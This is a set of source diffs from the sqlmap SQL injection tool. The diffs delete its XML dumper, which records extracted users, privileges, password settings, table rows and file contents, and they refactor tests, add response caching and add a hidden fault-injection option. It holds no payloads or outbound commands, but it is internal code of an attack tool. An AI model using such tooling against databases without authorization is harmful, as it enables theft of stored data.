from lib.core.settings import XML_RECOGNITION_REGEX
from lib.utils.hashdb import HashDB
-from lib.core.xmldump import dumper as xmldumper
from thirdparty.odict.odict import OrderedDict
def _setRequestParams():
@@ -593,11 +592,7 @@ def _createDumpDir():
conf.dumpPath = tempDir
def _configureDumper():
-if hasattr(conf, 'xmlFile') and conf.xmlFile:
-conf.dumper = xmldumper
-else:
conf.dumper = dumper
conf.dumper.setOutputFile()
def _createTargetDirs():

View File

@@ -41,6 +41,8 @@ class Failures(object):
failedParseOn = None
failedTraceBack = None
+_failures = Failures()
def smokeTest():
"""
Runs the basic smoke testing of a program
@@ -53,16 +55,17 @@ def smokeTest():
if any(_ in root for _ in ("thirdparty", "extra")):
continue
-for ifile in files:
+for filename in files:
+if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
length += 1
for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
if any(_ in root for _ in ("thirdparty", "extra")):
continue
-for ifile in files:
-if os.path.splitext(ifile)[1].lower() == ".py" and ifile != "__init__.py":
-path = os.path.join(root, os.path.splitext(ifile)[0])
+for filename in files:
+if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
+path = os.path.join(root, os.path.splitext(filename)[0])
path = path.replace(paths.SQLMAP_ROOT_PATH, '.')
path = path.replace(os.sep, '.').lstrip('.')
try:
@@ -71,7 +74,7 @@ def smokeTest():
except Exception, msg:
retVal = False
dataToStdout("\r")
-errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, ifile), msg)
+errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), msg)
logger.error(errMsg)
else:
# Run doc tests
@@ -192,11 +195,11 @@ def liveTest():
else:
errMsg = "test failed"
-if Failures.failedItems:
-errMsg += " at parsing items: %s" % ", ".join(i for i in Failures.failedItems)
+if _failures.failedItems:
+errMsg += " at parsing items: %s" % ", ".join(i for i in _failures.failedItems)
errMsg += " - scan folder: %s" % paths.SQLMAP_OUTPUT_PATH
-errMsg += " - traceback: %s" % bool(Failures.failedTraceBack)
+errMsg += " - traceback: %s" % bool(_failures.failedTraceBack)
if not vulnerable:
errMsg += " - SQL injection not detected"
@@ -204,14 +207,14 @@ def liveTest():
logger.error(errMsg)
test_case_fd.write("%s\n" % errMsg)
-if Failures.failedParseOn:
+if _failures.failedParseOn:
console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
-console_output_fd.write(Failures.failedParseOn)
+console_output_fd.write(_failures.failedParseOn)
console_output_fd.close()
-if Failures.failedTraceBack:
+if _failures.failedTraceBack:
traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING)
-traceback_fd.write(Failures.failedTraceBack)
+traceback_fd.write(_failures.failedTraceBack)
traceback_fd.close()
beep()
@@ -232,9 +235,9 @@ def liveTest():
return retVal
def initCase(switches, count):
-Failures.failedItems = []
-Failures.failedParseOn = None
-Failures.failedTraceBack = None
+_failures.failedItems = []
+_failures.failedParseOn = None
+_failures.failedTraceBack = None
paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="%s%d-" % (MKSTEMP_PREFIX.TESTING, count))
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
@@ -278,10 +281,10 @@ def runCase(parse):
LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__
if unhandled_exception:
-Failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc())
+_failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc())
retVal = None
elif handled_exception:
-Failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc())
+_failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc())
retVal = None
elif result is False: # this means no SQL injection has been detected - if None, ignore
retVal = False
@@ -298,17 +301,17 @@ def runCase(parse):
if item.startswith("r'") and item.endswith("'"):
if not re.search(item[2:-1], parse_on, re.DOTALL):
retVal = None
-Failures.failedItems.append(item)
+_failures.failedItems.append(item)
elif item not in parse_on:
retVal = None
-Failures.failedItems.append(item)
+_failures.failedItems.append(item)
-if Failures.failedItems:
-Failures.failedParseOn = console
+if _failures.failedItems:
+_failures.failedParseOn = console
elif retVal is False:
-Failures.failedParseOn = console
+_failures.failedParseOn = console
return retVal
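The testing hunk above stops touching class attributes directly (Failures.failedItems) and instead keeps state on a single module-level instance (_failures) that initCase() resets between runs. A stripped-down sketch of that pattern, with a simplified initCase() signature used purely for illustration:

class Failures(object):
    failedItems = None
    failedParseOn = None
    failedTraceBack = None

_failures = Failures()

def initCase():
    # reset per-case bookkeeping on the shared instance instead of mutating the class
    _failures.failedItems = []
    _failures.failedParseOn = None
    _failures.failedTraceBack = None

initCase()
_failures.failedItems.append("r'back-end DBMS: MySQL'")
print(_failures.failedItems, Failures.failedItems)   # instance holds the data, class stays untouched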

View File

@@ -42,6 +42,7 @@ class _ThreadData(threading.local):
self.disableStdOut = False
self.hashDBCursor = None
self.inTransaction = False
+self.lastCode = None
self.lastComparisonPage = None
self.lastComparisonHeaders = None
self.lastComparisonCode = None
@@ -58,6 +59,7 @@ class _ThreadData(threading.local):
self.retriesCount = 0
self.seqMatcher = difflib.SequenceMatcher(None)
self.shared = shared
+self.validationRun = 0
self.valueStack = []
ThreadData = _ThreadData()
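Both new attributes above live on a threading.local subclass, so every worker thread sees its own lastCode and validationRun. A minimal illustration of that mechanism (the field names mirror the diff, everything else is simplified):

import threading

class _ThreadData(threading.local):
    def __init__(self):
        # __init__ runs once per thread on first access, giving each thread fresh values
        self.lastCode = None
        self.validationRun = 0

ThreadData = _ThreadData()

def worker(code):
    ThreadData.lastCode = code        # visible only to the current thread
    ThreadData.validationRun += 1
    print("%s -> lastCode=%s" % (threading.current_thread().name, ThreadData.lastCode))

threads = [threading.Thread(target=worker, args=(200 + _,)) for _ in range(3)]
for t in threads:
    t.start()
for t in threads:
    t.join()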

View File

@@ -1,536 +0,0 @@
#!/usr/bin/env python
import codecs
import os
import re
import xml
import xml.sax.saxutils as saxutils
from lib.core.common import getUnicode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapFilePathException
from lib.core.settings import UNICODE_ENCODING
from thirdparty.prettyprint import prettyprint
from xml.dom.minidom import Document
from xml.parsers.expat import ExpatError
TECHNIC_ELEM_NAME = "Technic"
TECHNICS_ELEM_NAME = "Technics"
BANNER_ELEM_NAME = "Banner"
COLUMNS_ELEM_NAME = "DatabaseColumns"
COLUMN_ELEM_NAME = "Column"
CELL_ELEM_NAME = "Cell"
COLUMN_ATTR = "column"
ROW_ELEM_NAME = "Row"
TABLES_ELEM_NAME = "tables"
DATABASE_COLUMNS_ELEM = "DB"
DB_TABLES_ELEM_NAME = "DBTables"
DB_TABLE_ELEM_NAME = "DBTable"
IS_DBA_ELEM_NAME = "isDBA"
FILE_CONTENT_ELEM_NAME = "FileContent"
DB_ATTR = "db"
UNKNOWN_COLUMN_TYPE = "unknown"
USER_SETTINGS_ELEM_NAME = "UserSettings"
USER_SETTING_ELEM_NAME = "UserSetting"
USERS_ELEM_NAME = "Users"
USER_ELEM_NAME = "User"
DB_USER_ELEM_NAME = "DBUser"
SETTINGS_ELEM_NAME = "Settings"
DBS_ELEM_NAME = "DBs"
DB_NAME_ELEM_NAME = "DBName"
DATABASE_ELEM_NAME = "Database"
TABLE_ELEM_NAME = "Table"
DB_TABLE_VALUES_ELEM_NAME = "DBTableValues"
DB_VALUES_ELEM = "DBValues"
QUERIES_ELEM_NAME = "Queries"
QUERY_ELEM_NAME = "Query"
REGISTERY_ENTRIES_ELEM_NAME = "RegistryEntries"
REGISTER_DATA_ELEM_NAME = "RegisterData"
DEFAULT_DB = "All"
MESSAGE_ELEM = "Message"
MESSAGES_ELEM_NAME = "Messages"
ERROR_ELEM_NAME = "Error"
LST_ELEM_NAME = "List"
LSTS_ELEM_NAME = "Lists"
CURRENT_USER_ELEM_NAME = "CurrentUser"
CURRENT_DB_ELEM_NAME = "CurrentDB"
MEMBER_ELEM = "Member"
ADMIN_USER = "Admin"
REGULAR_USER = "User"
STATUS_ELEM_NAME = "Status"
RESULTS_ELEM_NAME = "Results"
UNHANDLED_PROBLEM_TYPE = "Unhandled"
NAME_ATTR = "name"
TYPE_ATTR = "type"
VALUE_ATTR = "value"
SUCESS_ATTR = "success"
NAME_SPACE_ATTR = 'http://www.w3.org/2001/XMLSchema-instance'
XMLNS_ATTR = "xmlns:xsi"
SCHEME_NAME = "sqlmap.xsd"
SCHEME_NAME_ATTR = "xsi:noNamespaceSchemaLocation"
CHARACTERS_TO_ENCODE = range(32) + range(127, 256)
ENTITIES = {'"': '&quot;', "'": "&apos;"}
class XMLDump(object):
'''
This class purpose is to dump the data into an xml Format.
The format of the xml file is described in the scheme file xml/sqlmap.xsd
'''
def __init__(self):
self._outputFile = None
self._outputFP = None
self.__root = None
self.__doc = Document()
def _addToRoot(self, element):
'''
Adds element to the root element
'''
self.__root.appendChild(element)
def __write(self, data, n=True):
'''
Writes the data into the file
'''
if n:
self._outputFP.write("%s\n" % data)
else:
self._outputFP.write("%s " % data)
self._outputFP.flush()
kb.dataOutputFlag = True
def _getRootChild(self, elemName):
'''
Returns the child of the root with the described name
'''
elements = self.__root.getElementsByTagName(elemName)
if elements:
return elements[0]
return elements
def _createTextNode(self, data):
'''
Creates a text node with utf8 data inside.
The text is escaped to an fit the xml text Format.
'''
if data is None:
return self.__doc.createTextNode(u'')
else:
escaped_data = saxutils.escape(data, ENTITIES)
return self.__doc.createTextNode(escaped_data)
def _createAttribute(self, attrName, attrValue):
'''
Creates an attribute node with utf8 data inside.
The text is escaped to an fit the xml text Format.
'''
attr = self.__doc.createAttribute(attrName)
if attrValue is None:
attr.nodeValue = u''
else:
attr.nodeValue = getUnicode(attrValue)
return attr
def string(self, header, data, sort=True):
'''
Adds string element to the xml.
'''
if isinstance(data, (list, tuple, set)):
self.lister(header, data, sort)
return
messagesElem = self._getRootChild(MESSAGES_ELEM_NAME)
if (not(messagesElem)):
messagesElem = self.__doc.createElement(MESSAGES_ELEM_NAME)
self._addToRoot(messagesElem)
if data:
data = self._formatString(data)
else:
data = ""
elem = self.__doc.createElement(MESSAGE_ELEM)
elem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
elem.appendChild(self._createTextNode(data))
messagesElem.appendChild(elem)
def lister(self, header, elements, sort=True):
'''
Adds information formatted as list element
'''
lstElem = self.__doc.createElement(LST_ELEM_NAME)
lstElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
if elements:
if sort:
try:
elements = set(elements)
elements = list(elements)
elements.sort(key=lambda x: x.lower())
except:
pass
for element in elements:
memberElem = self.__doc.createElement(MEMBER_ELEM)
lstElem.appendChild(memberElem)
if isinstance(element, basestring):
memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "string"))
memberElem.appendChild(self._createTextNode(element))
elif isinstance(element, (list, tuple, set)):
memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "list"))
for e in element:
memberElemStr = self.__doc.createElement(MEMBER_ELEM)
memberElemStr.setAttributeNode(self._createAttribute(TYPE_ATTR, "string"))
memberElemStr.appendChild(self._createTextNode(getUnicode(e)))
memberElem.appendChild(memberElemStr)
listsElem = self._getRootChild(LSTS_ELEM_NAME)
if not(listsElem):
listsElem = self.__doc.createElement(LSTS_ELEM_NAME)
self._addToRoot(listsElem)
listsElem.appendChild(lstElem)
def technic(self, technicType, data):
'''
Adds information about the technic used to extract data from the db
'''
technicElem = self.__doc.createElement(TECHNIC_ELEM_NAME)
technicElem.setAttributeNode(self._createAttribute(TYPE_ATTR, technicType))
textNode = self._createTextNode(data)
technicElem.appendChild(textNode)
technicsElem = self._getRootChild(TECHNICS_ELEM_NAME)
if not(technicsElem):
technicsElem = self.__doc.createElement(TECHNICS_ELEM_NAME)
self._addToRoot(technicsElem)
technicsElem.appendChild(technicElem)
def banner(self, data):
'''
Adds information about the database banner to the xml.
The banner contains information about the type and the version of the database.
'''
bannerElem = self.__doc.createElement(BANNER_ELEM_NAME)
bannerElem.appendChild(self._createTextNode(data))
self._addToRoot(bannerElem)
def currentUser(self, data):
'''
Adds information about the current database user to the xml
'''
currentUserElem = self.__doc.createElement(CURRENT_USER_ELEM_NAME)
textNode = self._createTextNode(data)
currentUserElem.appendChild(textNode)
self._addToRoot(currentUserElem)
def currentDb(self, data):
'''
Adds information about the current database is use to the xml
'''
currentDBElem = self.__doc.createElement(CURRENT_DB_ELEM_NAME)
textNode = self._createTextNode(data)
currentDBElem.appendChild(textNode)
self._addToRoot(currentDBElem)
def dba(self, isDBA):
'''
Adds information to the xml that indicates whether the user has DBA privileges
'''
isDBAElem = self.__doc.createElement(IS_DBA_ELEM_NAME)
isDBAElem.setAttributeNode(self._createAttribute(VALUE_ATTR, getUnicode(isDBA)))
self._addToRoot(isDBAElem)
def users(self, users):
'''
Adds a list of the existing users to the xml
'''
usersElem = self.__doc.createElement(USERS_ELEM_NAME)
if isinstance(users, basestring):
users = [users]
if users:
for user in users:
userElem = self.__doc.createElement(DB_USER_ELEM_NAME)
usersElem.appendChild(userElem)
userElem.appendChild(self._createTextNode(user))
self._addToRoot(usersElem)
def dbs(self, dbs):
'''
Adds a list of the existing databases to the xml
'''
dbsElem = self.__doc.createElement(DBS_ELEM_NAME)
if dbs:
for db in dbs:
dbElem = self.__doc.createElement(DB_NAME_ELEM_NAME)
dbsElem.appendChild(dbElem)
dbElem.appendChild(self._createTextNode(db))
self._addToRoot(dbsElem)
def userSettings(self, header, userSettings, subHeader):
'''
Adds information about the user's settings to the xml.
The information can be user's passwords, privileges and etc..
'''
self._areAdmins = set()
userSettingsElem = self._getRootChild(USER_SETTINGS_ELEM_NAME)
if (not(userSettingsElem)):
userSettingsElem = self.__doc.createElement(USER_SETTINGS_ELEM_NAME)
self._addToRoot(userSettingsElem)
userSettingElem = self.__doc.createElement(USER_SETTING_ELEM_NAME)
userSettingElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
if isinstance(userSettings, (tuple, list, set)):
self._areAdmins = userSettings[1]
userSettings = userSettings[0]
users = userSettings.keys()
users.sort(key=lambda x: x.lower())
for user in users:
userElem = self.__doc.createElement(USER_ELEM_NAME)
userSettingElem.appendChild(userElem)
if user in self._areAdmins:
userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, ADMIN_USER))
else:
userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, REGULAR_USER))
settings = userSettings[user]
settings.sort()
for setting in settings:
settingsElem = self.__doc.createElement(SETTINGS_ELEM_NAME)
settingsElem.setAttributeNode(self._createAttribute(TYPE_ATTR, subHeader))
settingTextNode = self._createTextNode(setting)
settingsElem.appendChild(settingTextNode)
userElem.appendChild(settingsElem)
userSettingsElem.appendChild(userSettingElem)
def dbTables(self, dbTables):
'''
Adds information of the existing db tables to the xml
'''
if not isinstance(dbTables, dict):
self.string(TABLES_ELEM_NAME, dbTables)
return
dbTablesElem = self.__doc.createElement(DB_TABLES_ELEM_NAME)
for db, tables in dbTables.items():
tables.sort(key=lambda x: x.lower())
dbElem = self.__doc.createElement(DATABASE_ELEM_NAME)
dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db))
dbTablesElem.appendChild(dbElem)
for table in tables:
tableElem = self.__doc.createElement(DB_TABLE_ELEM_NAME)
tableElem.appendChild(self._createTextNode(table))
dbElem.appendChild(tableElem)
self._addToRoot(dbTablesElem)
def dbTableColumns(self, tableColumns):
'''
Adds information about the columns of the existing tables to the xml
'''
columnsElem = self._getRootChild(COLUMNS_ELEM_NAME)
if not(columnsElem):
columnsElem = self.__doc.createElement(COLUMNS_ELEM_NAME)
for db, tables in tableColumns.items():
if not db:
db = DEFAULT_DB
dbElem = self.__doc.createElement(DATABASE_COLUMNS_ELEM)
dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db))
columnsElem.appendChild(dbElem)
for table, columns in tables.items():
tableElem = self.__doc.createElement(TABLE_ELEM_NAME)
tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table))
colList = columns.keys()
colList.sort(key=lambda x: x.lower())
for column in colList:
colType = columns[column]
colElem = self.__doc.createElement(COLUMN_ELEM_NAME)
if colType is not None:
colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, colType))
else:
colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNKNOWN_COLUMN_TYPE))
colElem.appendChild(self._createTextNode(column))
tableElem.appendChild(colElem)
self._addToRoot(columnsElem)
def dbTableValues(self, tableValues):
'''
Adds the values of specific table to the xml.
The values are organized according to the relevant row and column.
'''
tableElem = self.__doc.createElement(DB_TABLE_VALUES_ELEM_NAME)
if (tableValues is not None):
db = tableValues["__infos__"]["db"]
if not db:
db = "All"
table = tableValues["__infos__"]["table"]
count = int(tableValues["__infos__"]["count"])
columns = tableValues.keys()
columns.sort(key=lambda x: x.lower())
tableElem.setAttributeNode(self._createAttribute(DB_ATTR, db))
tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table))
for i in range(count):
rowElem = self.__doc.createElement(ROW_ELEM_NAME)
tableElem.appendChild(rowElem)
for column in columns:
if column != "__infos__":
info = tableValues[column]
value = info["values"][i]
if re.search("^[\ *]*$", value):
value = "NULL"
cellElem = self.__doc.createElement(CELL_ELEM_NAME)
cellElem.setAttributeNode(self._createAttribute(COLUMN_ATTR, column))
cellElem.appendChild(self._createTextNode(value))
rowElem.appendChild(cellElem)
dbValuesElem = self._getRootChild(DB_VALUES_ELEM)
if (not(dbValuesElem)):
dbValuesElem = self.__doc.createElement(DB_VALUES_ELEM)
self._addToRoot(dbValuesElem)
dbValuesElem.appendChild(tableElem)
logger.info("Table '%s.%s' dumped to XML file" % (db, table))
def dbColumns(self, dbColumns, colConsider, dbs):
'''
Adds information about the columns
'''
for column in dbColumns.keys():
printDbs = {}
for db, tblData in dbs.items():
for tbl, colData in tblData.items():
for col, dataType in colData.items():
if column in col:
if db in printDbs:
if tbl in printDbs[db]:
printDbs[db][tbl][col] = dataType
else:
printDbs[db][tbl] = {col: dataType}
else:
printDbs[db] = {}
printDbs[db][tbl] = {col: dataType}
continue
self.dbTableColumns(printDbs)
def query(self, query, queryRes):
'''
Adds details of an executed query to the xml.
The query details are the query itself and its results.
'''
queryElem = self.__doc.createElement(QUERY_ELEM_NAME)
queryElem.setAttributeNode(self._createAttribute(VALUE_ATTR, query))
queryElem.appendChild(self._createTextNode(queryRes))
queriesElem = self._getRootChild(QUERIES_ELEM_NAME)
if (not(queriesElem)):
queriesElem = self.__doc.createElement(QUERIES_ELEM_NAME)
self._addToRoot(queriesElem)
queriesElem.appendChild(queryElem)
def registerValue(self, registerData):
'''
Adds information about an extracted registry key to the xml
'''
registerElem = self.__doc.createElement(REGISTER_DATA_ELEM_NAME)
registerElem.appendChild(self._createTextNode(registerData))
registriesElem = self._getRootChild(REGISTERY_ENTRIES_ELEM_NAME)
if (not(registriesElem)):
registriesElem = self.__doc.createElement(REGISTERY_ENTRIES_ELEM_NAME)
self._addToRoot(registriesElem)
registriesElem.appendChild(registerElem)
def rFile(self, filePath, data):
'''
Adds an extracted file's content to the xml
'''
fileContentElem = self.__doc.createElement(FILE_CONTENT_ELEM_NAME)
fileContentElem.setAttributeNode(self._createAttribute(NAME_ATTR, filePath))
fileContentElem.appendChild(self._createTextNode(data))
self._addToRoot(fileContentElem)
def setOutputFile(self):
'''
Initiates the xml file from the configuration.
'''
if (conf.xmlFile):
try:
self._outputFile = conf.xmlFile
self.__root = None
if os.path.exists(self._outputFile):
try:
self.__doc = xml.dom.minidom.parse(self._outputFile)
self.__root = self.__doc.childNodes[0]
except ExpatError:
self.__doc = Document()
self._outputFP = codecs.open(self._outputFile, "w+", UNICODE_ENCODING)
if self.__root is None:
self.__root = self.__doc.createElementNS(NAME_SPACE_ATTR, RESULTS_ELEM_NAME)
self.__root.setAttributeNode(self._createAttribute(XMLNS_ATTR, NAME_SPACE_ATTR))
self.__root.setAttributeNode(self._createAttribute(SCHEME_NAME_ATTR, SCHEME_NAME))
self.__doc.appendChild(self.__root)
except IOError:
raise SqlmapFilePathException("Wrong filename provided for saving the xml file: %s" % conf.xmlFile)
def getOutputFile(self):
return self._outputFile
def finish(self, resultStatus, resultMsg=""):
'''
Finishes the dumper operation:
1. Adds the session status to the xml
2. Writes the xml to the file
3. Closes the xml file
'''
if ((self._outputFP is not None) and not(self._outputFP.closed)):
statusElem = self.__doc.createElement(STATUS_ELEM_NAME)
statusElem.setAttributeNode(self._createAttribute(SUCESS_ATTR, getUnicode(resultStatus)))
if not resultStatus:
errorElem = self.__doc.createElement(ERROR_ELEM_NAME)
if isinstance(resultMsg, Exception):
errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, type(resultMsg).__name__))
else:
errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNHANDLED_PROBLEM_TYPE))
errorElem.appendChild(self._createTextNode(getUnicode(resultMsg)))
statusElem.appendChild(errorElem)
self._addToRoot(statusElem)
self.__write(prettyprint.formatXML(self.__doc, encoding=UNICODE_ENCODING))
self._outputFP.close()
def closeDumper(status, msg=""):
"""
Closes the dumper of the session
"""
if hasattr(conf, "dumper") and hasattr(conf.dumper, "finish"):
conf.dumper.finish(status, msg)
dumper = XMLDump()

View File

@@ -759,6 +759,9 @@ def cmdLineParser(argv=None):
parser.add_option("--dummy", dest="dummy", action="store_true",
help=SUPPRESS_HELP)
+parser.add_option("--murphy-rate", dest="murphyRate", type="int",
+help=SUPPRESS_HELP)
parser.add_option("--pickled-options", dest="pickledOptions",
help=SUPPRESS_HELP)
@@ -882,7 +885,6 @@ def cmdLineParser(argv=None):
except ValueError, ex:
raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
-# Hide non-basic options in basic help case
for i in xrange(len(argv)):
if argv[i] == "-hh":
argv[i] = "-h"
@@ -910,6 +912,14 @@ def cmdLineParser(argv=None):
if not found:
parser.option_groups.remove(group)
+for verbosity in (_ for _ in argv if re.search(r"\A\-v+\Z", _)):
+try:
+if argv.index(verbosity) == len(argv) - 1 or not argv[argv.index(verbosity) + 1].isdigit():
+conf.verbose = verbosity.count('v') + 1
+del argv[argv.index(verbosity)]
+except (IndexError, ValueError):
+pass
try:
(args, _) = parser.parse_args(argv)
except UnicodeEncodeError, ex:
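The added loop above folds repeated short switches (-v, -vv, -vvv, ...) into a numeric verbosity before optparse ever sees them, unless the switch is followed by an explicit digit. A rough standalone approximation of that pre-parsing step (the function name is illustrative):

import re

def extract_verbosity(argv):
    """Return (verbosity or None, remaining argv) for -v style switches."""
    verbose = None
    argv = list(argv)
    for token in [_ for _ in argv if re.search(r"\A-v+\Z", _)]:
        index = argv.index(token)
        # "-v 3" style usage is left for the real option parser to handle
        if index == len(argv) - 1 or not argv[index + 1].isdigit():
            verbose = token.count('v') + 1    # mirrors the diff's count('v') + 1
            del argv[index]
    return verbose, argv

print(extract_verbosity(["sqlmap.py", "-u", "http://target/?id=1", "-vvv"]))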

View File

@@ -59,6 +59,13 @@ def htmlParser(page):
xmlfile = paths.ERRORS_XML
handler = HTMLHandler(page)
+key = hash(page)
+if key in kb.cache.parsedDbms:
+retVal = kb.cache.parsedDbms[key]
+if retVal:
+handler._markAsErrorPage()
+return retVal
parseXmlFile(xmlfile, handler)
@@ -68,6 +75,8 @@ def htmlParser(page):
else:
kb.lastParserStatus = None
+kb.cache.parsedDbms[key] = handler.dbms
# generic SQL warning/error messages
if re.search(r"SQL (warning|error|syntax)", page, re.I):
handler._markAsErrorPage()
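The cache introduced above keys already-parsed error pages on hash(page), so identical responses skip the errors.xml pass entirely. A simplified sketch of the same memoization idea, with detect_dbms_from_page() standing in for the real XML-driven handler:

import re

_parsed_cache = {}

def detect_dbms_from_page(page):
    # stand-in for the HTMLHandler/errors.xml logic
    if re.search(r"You have an error in your SQL syntax", page, re.I):
        return "MySQL"
    return None

def html_parser(page):
    key = hash(page)
    if key in _parsed_cache:
        return _parsed_cache[key]      # cache hit: no re-parsing
    retval = detect_dbms_from_page(page)
    _parsed_cache[key] = retval        # negative results are cached too
    return retval

page = "Warning: You have an error in your SQL syntax near '1'"
print(html_parser(page), html_parser(page))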

View File

@@ -26,6 +26,7 @@ from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
+from lib.core.decorators import cachedmethod
from lib.core.enums import DBMS
from lib.core.enums import HTTP_HEADER
from lib.core.enums import PLACE
@@ -136,6 +137,7 @@ def parseResponse(page, headers):
if page:
htmlParser(page)
+@cachedmethod
def checkCharEncoding(encoding, warn=True):
"""
Checks encoding name, repairs common misspellings and adjusts to
@@ -230,7 +232,10 @@ def getHeuristicCharEncoding(page):
Returns page encoding charset detected by usage of heuristics
Reference: http://chardet.feedparser.org/docs/
"""
-retVal = detect(page)["encoding"]
+key = hash(page)
+retVal = kb.cache.encoding.get(key) or detect(page)["encoding"]
+kb.cache.encoding[key] = retVal
if retVal:
infoMsg = "heuristics detected web page charset '%s'" % retVal
@@ -336,6 +341,8 @@ def processResponse(page, responseHeaders):
if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,):
kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page)
+else:
+kb.tableFrom = None
if conf.parseErrors:
msg = extractErrorMessage(page)
@@ -351,6 +358,10 @@ def processResponse(page, responseHeaders):
if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]:
if conf.paramDict[PLACE.POST][name] in page:
continue
+else:
+msg = "do you want to automatically adjust the value of '%s'? [y/N]" % name
+if readInput(msg, default='N').strip().upper() != 'Y':
+continue
conf.paramDict[PLACE.POST][name] = value
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])

View File

@@ -26,6 +26,7 @@ from lib.core.settings import MAX_RATIO
from lib.core.settings import REFLECTED_VALUE_MARKER
from lib.core.settings import LOWER_RATIO_BOUND
from lib.core.settings import UPPER_RATIO_BOUND
+from lib.core.settings import URI_HTTP_HEADER
from lib.core.threads import getCurrentThreadData
def comparison(page, headers, code=None, getRatioValue=False, pageLength=None):
@@ -48,7 +49,7 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
threadData = getCurrentThreadData()
if kb.testMode:
-threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else ""
+threadData.lastComparisonHeaders = listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else ""
threadData.lastComparisonPage = page
threadData.lastComparisonCode = code
@@ -56,7 +57,7 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
return None
if any((conf.string, conf.notString, conf.regexp)):
-rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page)
+rawResponse = "%s%s" % (listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else "", page)
# String to match in page when the query is True and/or valid
if conf.string:

View File

@@ -90,6 +90,7 @@ from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
from lib.core.settings import MAX_CONNECTIONS_REGEX
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
+from lib.core.settings import MAX_MURPHY_SLEEP_TIME
from lib.core.settings import META_REFRESH_REGEX
from lib.core.settings import MIN_TIME_RESPONSES
from lib.core.settings import IS_WIN
@@ -224,8 +225,10 @@ class Connect(object):
if conf.offline:
return None, None, None
-elif conf.dummy:
-return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None
+elif conf.dummy or conf.murphyRate and randomInt() % conf.murphyRate == 0:
+if conf.murphyRate:
+time.sleep(randomInt() % (MAX_MURPHY_SLEEP_TIME + 1))
+return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None if not conf.murphyRate else randomInt(3)
threadData = getCurrentThreadData()
with kb.locks.request:
@@ -403,7 +406,7 @@ class Connect(object):
responseHeaders = _(ws.getheaders())
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
-requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
+requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
requestMsg += "\n%s" % requestHeaders
if post is not None:
@@ -422,7 +425,7 @@ class Connect(object):
else:
req = urllib2.Request(url, post, headers)
-requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items())
+requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
conf.cj._policy._now = conf.cj._now = int(time.time())
@@ -556,7 +559,7 @@ class Connect(object):
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
if responseHeaders:
-logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
+logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
